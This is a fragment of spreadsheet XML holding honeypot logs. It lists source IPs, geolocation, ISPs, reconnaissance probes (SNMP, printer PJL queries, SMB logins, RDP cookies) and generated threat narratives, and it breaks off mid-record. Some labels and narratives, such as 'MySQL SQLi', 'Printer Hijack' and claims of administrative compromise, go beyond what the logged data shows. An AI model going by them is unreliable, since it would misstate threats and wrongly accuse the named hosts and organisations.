  </si>
  <si>
    <t>::ffff:3d00:5690</t>
  </si>
  <si>
    <t>3208e7f58ddba4aff4cb5853f991ca8c</t>
  </si>
  <si>
    <t>180.93.172.74</t>
  </si>
  <si>
    <t>SMA-LAB_VNC_H43&amp;&amp;SMA-LAB_VNC_HC1</t>
  </si>
  <si>
    <t>5900</t>
  </si>
  <si>
    <t>Ho Chi Minh</t>
  </si>
  <si>
    <t>Quận Bốn</t>
  </si>
  <si>
    <t>9645071</t>
  </si>
  <si>
    <t>10.7644</t>
  </si>
  <si>
    <t>106.696</t>
  </si>
  <si>
    <t>135944</t>
  </si>
  <si>
    <t>VinhNam Commercial informatics service corporation</t>
  </si>
  <si>
    <t>SPT</t>
  </si>
  <si>
    <t>Saigon Postel Corporation</t>
  </si>
  <si>
    <t>2009-07-23</t>
  </si>
  <si>
    <t>SPT-VN</t>
  </si>
  <si>
    <t>{Data_VNC:NA}</t>
  </si>
  <si>
    <t>::ffff:b45d:ac4a</t>
  </si>
  <si>
    <t>d4cb695a013cea6f7a56d4580757805d</t>
  </si>
  <si>
    <t>103.164.194.237</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MSSQL_H16&amp;&amp;SMA-LAB_SMB_H2&amp;&amp;SMA-LAB_MSSQL_H2&amp;&amp;SMA-LAB_SMB_H35&amp;&amp;SMA-LAB_MSSQL_H35&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H44&amp;&amp;SMA-LAB_IMAP_H33&amp;&amp;SMA-LAB_MT-CPA_H3&amp;&amp;SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_MSSQL_H18&amp;&amp;SMA-LAB_SMB_H46&amp;&amp;SMA-LAB_MSSQL_H46&amp;&amp;SMA-LAB_MSSQL_H26&amp;&amp;SMA-LAB_SMB_H26&amp;&amp;SMA-LAB_SMB_H18</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;1433&amp;&amp;445&amp;&amp;143&amp;&amp;39367&amp;&amp;61460&amp;&amp;57056&amp;&amp;NA</t>
  </si>
  <si>
    <t>Solusinet</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (103.164.194.237,63558)}&amp;&amp;{Data_SMB:Incoming connection (103.164.194.237,64117)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.164.194.237,59765)}&amp;&amp;{Data_SMB:Incoming connection (103.164.194.237,60160)}&amp;&amp;{Data_SMB:Incoming connection (103.164.194.237,57715)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.164.194.237,57576)}&amp;&amp;{Data_SMB:Incoming connection (103.164.194.237,58123)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.164.194.237,63588)}&amp;&amp;{Data_SMB:Incoming connection (103.164.194.237,64240)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.164.194.237,50805)}&amp;&amp;{Data_SMB:Incoming connection (103.164.194.237,51343)}&amp;&amp;{Data_SMB:Incoming connection (103.164.194.237,59997)}&amp;&amp;{Data_SMB:Incoming connection (103.164.194.237,60330)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.164.194.237,56192)}&amp;&amp;{Data_SMB:Incoming connection (103.164.194.237,56724)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.164.194.237,58556)}&amp;&amp;{Data_SMB:Incoming connection (103.164.194.237,63600)}&amp;&amp;{Data_SMB:Incoming connection (103.164.194.237,64089)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.164.194.237,54934)}&amp;&amp;{Data_SMB:Incoming connection (103.164.194.237,55586)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.164.194.237,60233)}&amp;&amp;{Data_SMB:Incoming connection (103.164.194.237,60829)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.164.194.237,61257)}&amp;&amp;{Data_SMB:Incoming connection (103.164.194.237,61969)}&amp;&amp;{Data_SMB:Incoming connection (103.164.194.237,51945)}&amp;&amp;{Data_SMB:Incoming connection (103.164.194.237,53169)}&amp;&amp;{Data_SMB:Incoming connection (103.164.194.237,53733)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.164.194.237,64544)}&amp;&amp;{Data_SMB:Incoming connection (103.164.194.237,65310)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.164.194.237,59920)}&amp;&amp;{Data_SMB:Incoming connection (103.164.194.237,60342)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.164.194.237,59208)}&amp;&amp;{Data_SMB:Incoming connection (103.164.194.237,62856)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.164.194.237,63352)}&amp;&amp;{Data_SMB:Incoming connection (103.164.194.237,63722)}&amp;&amp;{Data_SMB:Incoming connection (103.164.194.237,64038)}&amp;&amp;{Data_SMB:Incoming connection (103.164.194.237,64596)}&amp;&amp;{Data_SMB:Incoming connection (103.164.194.237,62366)}&amp;&amp;{Data_SMB:Incoming connection (103.164.194.237,62964)}&amp;&amp;{Data_SMB:Incoming connection (103.164.194.237,55200)}&amp;&amp;{Data_SMB:Incoming connection (103.164.194.237,55756)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.164.194.237,63199)}&amp;&amp;{Data_SMB:Incoming connection (103.164.194.237,63551)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}</t>
  </si>
  <si>
    <t>::ffff:67a4:c2ed</t>
  </si>
  <si>
    <t>An incoming network connection from IP address 103.164.194.237 to port 55,756 was detected.
This could be an attempted unauthorized access or reconnaissance activity.
Further investigation is required to determine the intentions behind this action. &amp;&amp; Possible malicious activity involves an unauthorized user accessing shared resources using SMB protocol, attempting to authenticate with administrator-level privileges. The success of the authentication suggests the attacker may have compromised credentials or exploited a vulnerability. This could be a precursor to further malicious actions such as data theft or system takeover. &amp;&amp; An attempt was made to authenticate as a user named "User" with administrative privileges on a Windows share using basic authentication credentials, which could be an indication of unauthorized access or malicious activity. This is because users should not typically have such credentials. The use of these credentials suggests possible exploitation of a vulnerability. &amp;&amp; The data indicates that an attempt was made to access Microsoft SQL database, which could be a sign of potential database exploitation or unauthorized access attempt. This might indicate malicious activity targeting sensitive database information. The attacker is likely probing for vulnerabilities in the database's security. &amp;&amp; An incoming SMB connection from an unknown IP address suggests potential unauthorized access to shared resources. This could be a reconnaissance or lateral movement attempt by an attacker. The source IP may be spoofed but it indicates malicious intent. &amp;&amp; An incoming connection from an unknown IP address suggests a potential hacking attempt to access or exploit the SMB service. The specific IP address may be associated with malicious activity. This could indicate a brute-force attack or an attempt to spread malware through the SMB port. &amp;&amp; An unknown system is attempting to connect to a shared resource on our network. The IP address 103.164.194.237 is making this connection from an external location. This could be a potential threat if unauthorized access is being sought. &amp;&amp; A user has authenticated on a shared resource using basic credentials.
This indicates an attempt to access sensitive files or folders.
Possible malicious intent may be involved as authentication bypassing. &amp;&amp; An unauthorized user has gained authentication on a shared SMB service by using basic credentials, potentially allowing them to access and manipulate files or system resources. This could be an attempt to gain elevated privileges or steal sensitive information. The user may be attempting to escalate their access rights within the network.</t>
  </si>
  <si>
    <t>SMB Scanning &amp;&amp; SMB Auth &amp;&amp; SMB Bruteforce &amp;&amp; SMB Scanning &amp;&amp; SMB Scan &amp;&amp; SMB Brute &amp;&amp; SMB Auth &amp;&amp; SMB Login</t>
  </si>
  <si>
    <t>10ec7734be2f53f4589adc7b97101e27</t>
  </si>
  <si>
    <t>113.199.226.5</t>
  </si>
  <si>
    <t>NP</t>
  </si>
  <si>
    <t>Nepal</t>
  </si>
  <si>
    <t>P3</t>
  </si>
  <si>
    <t>Bagmati Province</t>
  </si>
  <si>
    <t>Lalitpur</t>
  </si>
  <si>
    <t>Patan</t>
  </si>
  <si>
    <t>1282931</t>
  </si>
  <si>
    <t>27.6766</t>
  </si>
  <si>
    <t>85.3142</t>
  </si>
  <si>
    <t>23752</t>
  </si>
  <si>
    <t>Nepal Telecommunications Corporation</t>
  </si>
  <si>
    <t>::ffff:71c7:e205</t>
  </si>
  <si>
    <t>7f835607b81777425bb5bf854a2c831e</t>
  </si>
  <si>
    <t>139.167.56.10</t>
  </si>
  <si>
    <t>Thane</t>
  </si>
  <si>
    <t>Navi Mumbai (Reliance Corporate Park)</t>
  </si>
  <si>
    <t>6619347</t>
  </si>
  <si>
    <t>19.136</t>
  </si>
  <si>
    <t>73.0039</t>
  </si>
  <si>
    <t>1990-03-24</t>
  </si>
  <si>
    <t>::ffff:8ba7:380a</t>
  </si>
  <si>
    <t>d4d1420d2eb942593556137feacfbca0</t>
  </si>
  <si>
    <t>198.235.24.153</t>
  </si>
  <si>
    <t>Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Suspicious Web Activity Detected</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_FTP_H38&amp;&amp;SMA-LAB_IMAP_H11&amp;&amp;SMA-LAB_SOCKS5_H44&amp;&amp;SMA-LAB_SOCKS5_H6&amp;&amp;SMA-LAB_SIP_H14&amp;&amp;SMA-LAB_MYSQL_H13&amp;&amp;SMA-LAB_POP3_H29&amp;&amp;SMA-LAB_MT-CPA_H42&amp;&amp;SMA-LAB_IMAP_H2&amp;&amp;SMA-LAB_PJL_H16&amp;&amp;SMA-LAB_PJL_H4&amp;&amp;SMA-LAB_REDIS_H16&amp;&amp;SMA-LAB_IMAP_H16&amp;&amp;SMA-LAB_FTP_H12&amp;&amp;SMA-LAB_SNMP_H37&amp;&amp;SMA-LAB_SNMP_H11&amp;&amp;SMA-LAB_RDP_H33&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_POSTGRES_H14&amp;&amp;SMA-LAB_SNMP_H2&amp;&amp;SMA-LAB_LDAP_H10&amp;&amp;SMA-LAB_PJL_H17&amp;&amp;SMA-LAB_PJL_H27&amp;&amp;SMA-LAB_MYSQL_H34&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_VNC_H38&amp;&amp;SMA-LAB_SIP_H39&amp;&amp;SMA-LAB_MSSQL_H32&amp;&amp;SMA-LAB_MYSQL_H19&amp;&amp;SMA-LAB_POSTGRES_H5&amp;&amp;SMA-LAB_MYSQL_H28&amp;&amp;SMA-LAB_PJL_H5&amp;&amp;SMA-LAB_PJL_H29&amp;&amp;SMA-LAB_PJL_H35&amp;&amp;SMA-LAB_POSTGRES_H16&amp;&amp;SMA-LAB_ORACLE_H35&amp;&amp;SMA-LAB_MSSQL_H9&amp;&amp;SMA-LAB_ORACLE_H47&amp;&amp;SMA-LAB_RDP_H39&amp;&amp;SMA-LAB_POSTGRES_H6&amp;&amp;SMA-LAB_SNMP_H45&amp;&amp;SMA-LAB_PJL_H40&amp;&amp;SMA-LAB_PJL_H9&amp;&amp;SMA-LAB_PJL_H31&amp;&amp;SMA-LAB_MYSQL_H33&amp;&amp;SMA-LAB_MT-CPA_H36&amp;&amp;SMA-LAB_IMAP_H9&amp;&amp;SMA-LAB_POSTGRES_H46&amp;&amp;SMA-LAB_SNMP_H46&amp;&amp;SMA-LAB_FTP_H11&amp;&amp;SMA-LAB_MYSQL_H47</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;21&amp;&amp;143&amp;&amp;1080&amp;&amp;NA&amp;&amp;3306&amp;&amp;110&amp;&amp;33394&amp;&amp;9100&amp;&amp;6379&amp;&amp;161&amp;&amp;3389&amp;&amp;23&amp;&amp;5432&amp;&amp;1433&amp;&amp;5900&amp;&amp;1521&amp;&amp;53191&amp;&amp;443&amp;&amp;6667</t>
  </si>
  <si>
    <t>connection&amp;&amp;query&amp;&amp;GET&amp;&amp;command&amp;&amp;stshash</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_NTP:NA}&amp;&amp;{Data_SNMP:NA}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1.1.1.0', 'version': '0'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1', 'version': '1'}}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'CAPA'}}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=YTQkrY'}}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_IRC:NA}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}</t>
  </si>
  <si>
    <t>::ffff:c6eb:1899</t>
  </si>
  <si>
    <t>Unauthorized access to network management system, possible scanning or probing activity using a well-known community string "public". This indicates an attempt to gather information about the targeted network's configuration and topology. The use of "public" community string suggests a lack of security awareness. &amp;&amp; The log indicates that there was an attempt to access or exploit a MySQL service, potentially for malicious purposes such as unauthorized data retrieval or database tampering. This could be a brute force attack or a targeted attempt to gain access to sensitive information. The lack of success in accessing the database suggests it may have been blocked by security measures. &amp;&amp; The presence of this log entry indicates a possible printer exploitation attempt, as it suggests an unauthorized device is attempting to gain information about the printer's configuration. This could be part of a larger print spooler vulnerability exploit. It may also indicate an attempt to discover sensitive printer settings. &amp;&amp; Malicious actor attempted printer job information extraction, likely for reconnaissance or exploitation purposes. This could be a precursor to unauthorized print jobs or further attacks on the system. The goal is to gather sensitive information about the printer's configuration and functionality. &amp;&amp; Possible malicious activity is a printer exploitation attempt, where an attacker is sending a command to gather information about the printer's capabilities and settings. This could be used to identify vulnerabilities or gain unauthorized access. The attacker may be attempting to exploit the printer for further attacks or data exfiltration. &amp;&amp; The data suggests a potential attempt to exploit a printer's configuration vulnerability, as it attempts to send an invalid printer control sequence.
This behavior is unusual and may indicate malicious activity intended to gain unauthorized access or extract sensitive information from the targeted system.
It appears to be a reconnaissance step, trying to gather information about the device's settings.</t>
  </si>
  <si>
    <t>MySQL SQLi &amp;&amp; Printer Hack &amp;&amp; Printer Hijack &amp;&amp; Printer Hack &amp;&amp; Print Job Exploitation</t>
  </si>
  <si>
    <t>6d0c919d4ab849ff23e65fabc158750d</t>
  </si>
  <si>
    <t>115.187.31.242</t>
  </si>
  <si>
    <t>SMA-LAB_MSSQL_H33&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SMB_H35&amp;&amp;SMA-LAB_MSSQL_H35&amp;&amp;SMA-LAB_MSSQL_H2</t>
  </si>
  <si>
    <t>Kota Administrasi Jakarta Selatan</t>
  </si>
  <si>
    <t>-6.23278</t>
  </si>
  <si>
    <t>106.845</t>
  </si>
  <si>
    <t>58369</t>
  </si>
  <si>
    <t>PT. Fiber Networks Indonesia</t>
  </si>
  <si>
    <t>PT Patra Badak Arun Solusi</t>
  </si>
  <si>
    <t>2023-11-13</t>
  </si>
  <si>
    <t>IDNIC-PBAS-ID</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (115.187.31.242,62119)}&amp;&amp;{Data_SMB:Incoming connection (115.187.31.242,62619)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}</t>
  </si>
  <si>
    <t>::ffff:73bb:1ff2</t>
  </si>
  <si>
    <t>be4a018e09ccf459966c6873b66ce458</t>
  </si>
  <si>
    <t>222.127.203.182</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>40</t>
  </si>
  <si>
    <t>Calabarzon</t>
  </si>
  <si>
    <t>Rizal</t>
  </si>
  <si>
    <t xml:space="preserve"> Muntinlupa</t>
  </si>
  <si>
    <t>1699076</t>
  </si>
  <si>
    <t>14.3903</t>
  </si>
  <si>
    <t>121.048</t>
  </si>
  <si>
    <t>132199</t>
  </si>
  <si>
    <t>Globe Telecom Inc.</t>
  </si>
  <si>
    <t>GLBB</t>
  </si>
  <si>
    <t>::ffff:de7f:cbb6</t>
  </si>
  <si>
    <t>ea7b08b0d4051693182d8ac250a76cdc</t>
  </si>
  <si>
    <t>61.1.142.26</t>
  </si>
  <si>
    <t>::ffff:3d01:8e1a</t>
  </si>
  <si>
    <t>673371b8887dc01b90ffeb93d40c2489</t>
  </si>
  <si>
    <t>103.224.73.78</t>
  </si>
  <si>
    <t>SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H45</t>
  </si>
  <si>
    <t>1433&amp;&amp;445&amp;&amp;3306</t>
  </si>
  <si>
    <t>{'cbl.abuseat.org': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['exploits']}</t>
  </si>
  <si>
    <t>-6.2289200000000005</t>
  </si>
  <si>
    <t>106.847</t>
  </si>
  <si>
    <t>PT Asuransi Takaful Umum</t>
  </si>
  <si>
    <t>2023-10-03</t>
  </si>
  <si>
    <t>IDNIC-TAKAFULUMUM-ID</t>
  </si>
  <si>
    <t>{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (103.224.73.78,49446)}&amp;&amp;{Data_SMB:Incoming connection (103.224.73.78,65178)}&amp;&amp;{Data_SMB:Incoming connection (103.224.73.78,57490)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.224.73.78,65020)}&amp;&amp;{Data_SMB:Incoming connection (103.224.73.78,56216)}&amp;&amp;{Data_MYSQL:NA}</t>
  </si>
  <si>
    <t>::ffff:67e0:494e</t>
  </si>
  <si>
    <t>ddf360e73aa4c32d96c4324eb55cf3d7</t>
  </si>
  <si>
    <t>117.223.25.139</t>
  </si>
  <si>
    <t>::ffff:75df:198b</t>
  </si>
  <si>
    <t>4eb9fe2cf3d6852d81c154f50a1f11d6</t>
  </si>
  <si>
    <t>212.91.161.162</t>
  </si>
  <si>
    <t>['anonymous-proxy'&amp;&amp; 'attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H43&amp;&amp;SMA-LAB_MT-CPA_H38&amp;&amp;SMA-LAB_MSSQL_H27&amp;&amp;SMA-LAB_MSSQL_H35&amp;&amp;SMA-LAB_MSSQL_H46&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H16&amp;&amp;SMA-LAB_MSSQL_H5&amp;&amp;SMA-LAB_MSSQL_H34</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;24007&amp;&amp;1433&amp;&amp;NA</t>
  </si>
  <si>
    <t>vpn</t>
  </si>
  <si>
    <t>BG</t>
  </si>
  <si>
    <t>Bulgaria</t>
  </si>
  <si>
    <t>22</t>
  </si>
  <si>
    <t>Sofia-grad</t>
  </si>
  <si>
    <t>Sofia</t>
  </si>
  <si>
    <t>Sofia (g.k. Iztok)</t>
  </si>
  <si>
    <t>727011</t>
  </si>
  <si>
    <t>1000</t>
  </si>
  <si>
    <t>42.6636</t>
  </si>
  <si>
    <t>23.3575</t>
  </si>
  <si>
    <t>8717</t>
  </si>
  <si>
    <t>A1 Bulgaria EAD</t>
  </si>
  <si>
    <t>Spectrum</t>
  </si>
  <si>
    <t>::ffff:d45b:a1a2</t>
  </si>
  <si>
    <t>fa51254fa924bd7a867e9577eac04b45</t>
  </si>
  <si>
    <t>152.32.159.79</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MSSQL_H40&amp;&amp;SMA-LAB_SSH_H38&amp;&amp;SMA-LAB_SSH_H13&amp;&amp;SMA-LAB_MYSQL_H32&amp;&amp;SMA-LAB_FTP_H23&amp;&amp;SMA-LAB_MYSQL_HC1&amp;&amp;SMA-LAB_MT-CPA_H3&amp;&amp;SMA-LAB_HTTP_H6&amp;&amp;SMA-LAB_REDIS_H4&amp;&amp;SMA-LAB_POP3_H19&amp;&amp;SMA-LAB_REDIS_H12&amp;&amp;SMA-LAB_POP3_H18&amp;&amp;SMA-LAB_MYSQL_H8</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;1433&amp;&amp;22&amp;&amp;3306&amp;&amp;21&amp;&amp;48649&amp;&amp;80&amp;&amp;6379&amp;&amp;110&amp;&amp;5432&amp;&amp;33524&amp;&amp;143&amp;&amp;NA&amp;&amp;56011&amp;&amp;1080&amp;&amp;5900&amp;&amp;44704&amp;&amp;23</t>
  </si>
  <si>
    <t>login&amp;&amp;connection&amp;&amp;NA&amp;&amp;request</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': '50000', 'contact': '&lt;sip:nm@nm&gt;', 'content-length': '0', 'cseq': '42 OPTIONS', 'from': '&lt;sip:nm@nm&gt;;tag=root', 'max-forwards': '70', 'to': '&lt;sip:nm2@nm2&gt;', 'via': 'SIP/2.0/UDP nm:5060;branch=foo;received=152.32.159.79;rport=43729'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': '50000', 'contact': '&lt;sip:nm@nm&gt;', 'content-length': '0', 'cseq': '42 OPTIONS', 'from': '&lt;sip:nm@nm&gt;;tag=root', 'max-forwards': '70', 'to': '&lt;sip:nm2@nm2&gt;', 'via': 'SIP/2.0/UDP nm:5060;branch=foo;received=152.32.159.79;rport=40103'}}&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_TELNET:NA}</t>
  </si>
  <si>
    <t>::ffff:9820:9f4f</t>
  </si>
  <si>
    <t>224a0c2250f5d8971cc4e427e9cd2561</t>
  </si>
  <si>
    <t>87.236.176.5</t>
  </si>
  <si>
    <t>NA&amp;&amp;transformative.monitoring.internet-measurement.com</t>
  </si>
  <si>
    <t>['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:mail'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Encryption Misuse&amp;&amp;Suspicious Web Activity Detected</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SOCKS5_H41&amp;&amp;SMA-LAB_REDIS_H21&amp;&amp;SMA-LAB_IRC_H29&amp;&amp;SMA-LAB_PJL_H4&amp;&amp;SMA-LAB_POP3_H21&amp;&amp;SMA-LAB_POSTGRES_H40&amp;&amp;SMA-LAB_REDIS_H28&amp;&amp;SMA-LAB_HTTPS_H21&amp;&amp;SMA-LAB_FTP_H39&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_REDIS_H4&amp;&amp;SMA-LAB_SIP_H3&amp;&amp;SMA-LAB_REDIS_HC1&amp;&amp;SMA-LAB_SMB_H27&amp;&amp;SMA-LAB_POP3_H30&amp;&amp;SMA-LAB_SIP_H12&amp;&amp;SMA-LAB_REDIS_H24&amp;&amp;SMA-LAB_REDIS_H10&amp;&amp;SMA-LAB_POP3_H17&amp;&amp;SMA-LAB_LDAP_H24&amp;&amp;SMA-LAB_POSTGRES_H11&amp;&amp;SMA-LAB_SOCKS5_H37&amp;&amp;SMA-LAB_REDIS_H32&amp;&amp;SMA-LAB_REDIS_H31&amp;&amp;SMA-LAB_TELNET_H31&amp;&amp;SMA-LAB_REDIS_H41&amp;&amp;SMA-LAB_REDIS_H16&amp;&amp;SMA-LAB_REDIS_H30&amp;&amp;SMA-LAB_MT-CPA_H27&amp;&amp;SMA-LAB_REDIS_H29&amp;&amp;SMA-LAB_FTP_H12&amp;&amp;SMA-LAB_POP3_H45&amp;&amp;SMA-LAB_POSTGRES_H9&amp;&amp;SMA-LAB_IMAP_H21&amp;&amp;SMA-LAB_REDIS_H34&amp;&amp;SMA-LAB_REDIS_H38&amp;&amp;SMA-LAB_REDIS_H40&amp;&amp;SMA-LAB_SOCKS5_H2&amp;&amp;SMA-LAB_IMAP_H13&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_IRC_H31&amp;&amp;SMA-LAB_POSTGRES_H45&amp;&amp;SMA-LAB_POSTGRES_H31&amp;&amp;SMA-LAB_PJL_H8&amp;&amp;SMA-LAB_REDIS_H47&amp;&amp;SMA-LAB_LDAP_H17&amp;&amp;SMA-LAB_REDIS_H15&amp;&amp;SMA-LAB_SMB_H16&amp;&amp;SMA-LAB_MYSQL_H47&amp;&amp;SMA-LAB_SIP_H46&amp;&amp;SMA-LAB_IMAP_H15&amp;&amp;SMA-LAB_HTTPS_H8&amp;&amp;SMA-LAB_REDIS_H27&amp;&amp;SMA-LAB_MSSQL_H17&amp;&amp;SMA-LAB_SOCKS5_H24&amp;&amp;SMA-LAB_REDIS_H46&amp;&amp;SMA-LAB_IRC_H13&amp;&amp;SMA-LAB_SOCKS5_H17&amp;&amp;SMA-LAB_REDIS_H45</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;1080&amp;&amp;6379&amp;&amp;6667&amp;&amp;9100&amp;&amp;110&amp;&amp;5432&amp;&amp;443&amp;&amp;21&amp;&amp;23&amp;&amp;NA&amp;&amp;445&amp;&amp;389&amp;&amp;22531&amp;&amp;143&amp;&amp;3306&amp;&amp;1433&amp;&amp;1521&amp;&amp;25&amp;&amp;3389</t>
  </si>
  <si>
    <t>connection&amp;&amp;command&amp;&amp;GET&amp;&amp;NA&amp;&amp;stshash</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_IRC:NA}&amp;&amp;{Data_IRC:{'command': 'HELP', 'params': '[]', 'prefix': ''}}&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '185.255.123.181', 'User-Agent': 'Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_SMTP:NA}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'STARTTLS', 'data': 'None'}}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '154.93.37.45', 'User-Agent': 'Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'a001'}}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'CAPA'}}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'QUIT'}}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': 'HELP'}}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': 'SYST'}}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': 'QUIT'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=eltons'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 